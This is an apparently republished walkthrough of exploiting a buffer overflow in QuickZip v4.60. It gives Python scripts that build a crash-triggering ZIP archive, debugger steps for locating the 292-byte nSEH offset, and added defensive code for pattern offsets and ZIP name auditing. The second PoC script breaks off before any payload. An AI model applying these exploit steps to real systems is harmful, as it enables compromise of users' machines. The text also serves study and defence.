QuickZip v4.60 buffer overflow vulnerability details

ID MYHACK58:62201786029
Type myhack58
Reporter Anonymous
Modified 2017-05-11T00:00:00


This article gives the reader a detailed walkthrough of the QuickZip v4.60 buffer overflow vulnerability. Because the vulnerability surfaced in 2010, the existing exploit targets only 32-bit Windows XP, so I decided to try to reproduce it on 64-bit Windows 7, which promised to be a fun challenge!

PoC

To start, I grabbed the QuickZip v4.60 exploit for Windows XP from exploit-db and used it to build a simple PoC that triggers the crash.

#!/usr/bin/python

# Local file header (signature PK\x03\x04)
header_1 = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00")
# Central directory file header (signature PK\x01\x02)
header_2 = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00"
            "\x24\x00\x00\x00\x00\x00\x00\x00")
# End of central directory record (signature PK\x05\x06)
header_3 = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
            "\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00")

print "[+] Building PoC.."
max_size = 4064
payload = "A" * max_size      # the oversized entry name
payload += ".txt"
print "[+] Length = " + str(len(payload))
exploit = header_1 + payload + header_2 + payload + header_3
mefile = open('cst.zip', 'wb')  # binary mode so no header byte gets translated
mefile.write(exploit)
mefile.close()
print "[+] Exploit complete!"

The script above creates a ZIP archive that contains a single entry whose file name is 4064 "A" characters followed by the extension ".txt". header_1, header_2 and header_3 are the headers the ZIP file format requires. I won't go into the details here, but you can read more about it here.

If you open the newly created ZIP file in QuickZip and try to extract its contents, or simply double-click the file name, QuickZip crashes.

Understanding the crash

OK, let's run the PoC and see what happens. Create the ZIP file with the Python script above, open it in QuickZip, start Immunity Debugger, attach it to the QuickZip process, and then double-click the file name in QuickZip to trigger the crash. Note: we will repeat this process many times!

As expected, QuickZip crashes. In addition, an exception occurs; at the bottom of the screen you can see "Access violation when writing to [00190000]". This means we tried to write to an invalid memory address, which triggered the exception. Next, let's examine the SEH chain.

It looks like we control the nSEH pointer! Next, we try to calculate the offset.

Offset

As always, I use mona (https://github.com/corelan/mona) to do most of the work.
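The next two steps use mona's pattern commands to turn the bytes that land in the SEH record into an offset into the input. As an added illustration of that technique, which is not code from the article or from mona, the following Python 3 snippet builds the same style of cyclic pattern (upper-case, lower-case, digit triples) and looks up the offset of a 4-byte value, either as the ASCII string seen in the input or as the little-endian DWORD a debugger displays. The sample values in the main block are constructed for this example; the same lookup is what a crash-triage script does when bucketing fuzzer crashes.

```python
#!/usr/bin/env python3
"""Cyclic pattern generation and offset lookup (added example)."""
import string


def cyclic_pattern(length):
    """Build a pattern of 'Aa0Aa1...' triples. No triple repeats within the
    first 20280 bytes, so any 4-byte window read back from a register or an
    SEH slot identifies its position in the input."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(pattern, value):
    """Return the offset of `value` inside `pattern`, or -1 if absent.

    `value` may be the 4-character string found in the input, or the integer
    a debugger shows for the overwritten field; the integer is converted
    back to the little-endian byte order in which x86 stored it."""
    if isinstance(value, int):
        needle = value.to_bytes(4, "little").decode("ascii", "replace")
    else:
        needle = value
    return pattern.find(needle)


if __name__ == "__main__":
    # Constructed sample: the same length the article's PoC uses.
    pattern = cyclic_pattern(4064)
    print("pattern length:", len(pattern))
    # Constructed value: a debugger showing 0x41396141 in the nSEH field
    # corresponds to the bytes "Aa9A" at offset 27 of the pattern.
    print("offset of 0x41396141:", pattern_offset(pattern, 0x41396141))
```

The offset the article reports (292 for nSEH) comes from running exactly this kind of lookup against the value Immunity Debugger displays after the crash; the snippet cannot reproduce that number because it has no crash to read from, it only shows how the number is derived.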
First, we generate a unique 4064-character pattern with mona and put it in the PoC's payload:

!mona pc 4064

Trigger the crash again and see what happens.

Hmm, the crash looks a bit different this time. The problem here is a LEAVE instruction that tries to return, via the stack, to address 0EEDFADE, which is an invalid memory address in this program. In addition, it seems we no longer control SEH. However, note that we are actually in a kernel module; look at the name of the Immunity window: "CPU - main thread, module KERNELBA". Pressing SHIFT + F9 passes the exception on to the program, so we can see whether another exception is triggered, this time inside the QuickZip module.

Awesome, it looks like it worked! Use the following command to have mona calculate all the offsets:

!mona findmsp

Here, the offset we are most interested in is the one for the nSEH field: 292. Let's update the PoC with this offset and try to trigger the crash again.

#!/usr/bin/python

# Local file header (signature PK\x03\x04)
header_1 = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00")
# Central directory file header (signature PK\x01\x02)
header_2 = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00"
            "\x24\x00\x00\x00\x00\x00\x00\x00")
# End of central directory record (signature PK\x05\x06)
header_3 = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
            "\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00")

print "[+] Building PoC.."
max_size = 4064
nseh_offset = 292
payload = "A" * nseh_offset  # padding up to nSEH
payload += "BBBB"            # nSEH
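The PoC relies on an archive whose single entry name is far longer than any path the target could ever extract. On the defending side, that is also the simplest thing to check before an archive reaches a parser like this one. The following Python 3 script is an added example, not code from the article or from the QuickZip project: it walks the ZIP central directory, cross-checks each entry against the local file header it points at, and reports names longer than a limit or local/central name-length fields that disagree. The 260-byte limit (Windows MAX_PATH), the finding format and the samples built with the standard library's zipfile module are choices made for this example.

```python
#!/usr/bin/env python3
"""Pre-extraction audit of ZIP entry names (added example)."""
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"   # end of central directory record (22 bytes + comment)
CDIR_SIG = b"PK\x01\x02"   # central directory file header (46 bytes + variable part)
LFH_SIG = b"PK\x03\x04"    # local file header (30 bytes + variable part)

# Windows MAX_PATH. A longer name can never be extracted to a valid path, so it
# is only useful to someone trying to overrun a fixed-size name buffer.
# Threshold chosen for this example; tune it for your environment.
MAX_NAME_LEN = 260


def _find_eocd(data):
    """Offset of the EOCD record: it ends the file apart from an optional
    comment of at most 65535 bytes, so search backwards from the tail."""
    start = max(0, len(data) - 22 - 65535)
    pos = data.rfind(EOCD_SIG, start)
    if pos < 0 or pos + 22 > len(data):
        raise ValueError("no end-of-central-directory record found")
    return pos


def audit_zip_names(data, limit=MAX_NAME_LEN):
    """Return a list of (entry_index, reason) findings for `data` (bytes).
    An empty list means every entry passed the checks."""
    findings = []
    eocd = _find_eocd(data)
    _, _, _, _, entries, _, cd_offset, _ = struct.unpack(
        "<4sHHHHIIH", data[eocd:eocd + 22])
    pos = cd_offset
    for idx in range(entries):
        if data[pos:pos + 4] != CDIR_SIG:
            findings.append((idx, "central directory header signature missing"))
            break
        cd = struct.unpack("<4sHHHHHHIIIHHHHHII", data[pos:pos + 46])
        cd_name_len, extra_len, comment_len, lfh_offset = cd[10], cd[11], cd[12], cd[16]
        # The local header must agree with the central directory; extractors
        # differ in which of the two they trust, so a mismatch is suspicious.
        lfh = data[lfh_offset:lfh_offset + 30]
        if len(lfh) < 30 or lfh[:4] != LFH_SIG:
            findings.append((idx, "local file header signature missing"))
            lfh_name_len = cd_name_len
        else:
            lfh_name_len = struct.unpack("<4sHHHHHIIIHH", lfh)[9]
        longest = max(cd_name_len, lfh_name_len)
        if longest > limit:
            findings.append((idx, "entry name length %d exceeds %d" % (longest, limit)))
        if cd_name_len != lfh_name_len:
            findings.append((idx, "local/central name length mismatch (%d vs %d)"
                             % (lfh_name_len, cd_name_len)))
        pos += 46 + cd_name_len + extra_len + comment_len
    return findings


def build_sample(name):
    """Constructed sample: a one-entry stored archive built with zipfile."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, b"hello")
    return buf.getvalue()


def tamper_local_name_len(data, new_len, lfh_offset=0):
    """Constructed sample: overwrite the name-length field (bytes 26-27) of the
    local file header at `lfh_offset` so it no longer matches the directory."""
    buf = bytearray(data)
    struct.pack_into("<H", buf, lfh_offset + 26, new_len)
    return bytes(buf)


if __name__ == "__main__":
    samples = (
        ("benign", build_sample("hello.txt")),
        ("long-name", build_sample("A" * 4064 + ".txt")),   # same name length as the PoC
        ("tampered", tamper_local_name_len(build_sample("hello.txt"), 4068)),
    )
    for label, blob in samples:
        print(label, audit_zip_names(blob) or "clean")
```

Parsing the central directory rather than calling zipfile on untrusted input keeps the audit independent of how a particular extractor resolves the two headers, which is the point: the vulnerable program trusted a length field it should have bounded first.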
